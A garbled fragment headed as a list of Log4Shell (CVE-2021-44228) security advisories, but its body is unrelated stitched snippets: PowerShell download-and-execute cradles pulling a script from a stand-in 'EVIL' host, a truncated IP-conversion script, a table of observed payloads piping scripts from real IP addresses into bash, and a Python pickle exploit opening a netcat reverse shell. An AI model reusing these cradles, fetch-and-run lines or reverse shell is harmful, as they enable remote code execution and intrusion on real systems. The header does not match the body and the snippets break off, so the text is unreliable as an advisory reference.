Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
```powershell
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
```
```python
"""
You can run this in the following format:
For decimal: python3 ip2dh.py D <Ip-address>
For Hexadecimal: python3 ip2dh.py H <Ip-address>
"""
#!/usr/bin/python3
import sys
if len(sys.argv) < 3:
```
| b64decoded | hits |
|---|---|
| `(curl -s 45.155.205.233:5874/<IP_ADDRESS>\|\|wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)\|bash` | 2056 |
| `(curl -s 80.71.158.12/lh.sh\|\|wget -q -O- 80.71.158.12/lh.sh)\|bash` | 162 |
| `(curl -s 80.71.158.44/lh.sh\|\|wget -q -O- 80.71.158.44/lh.sh)\|bash` | 2 |
```python
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))
```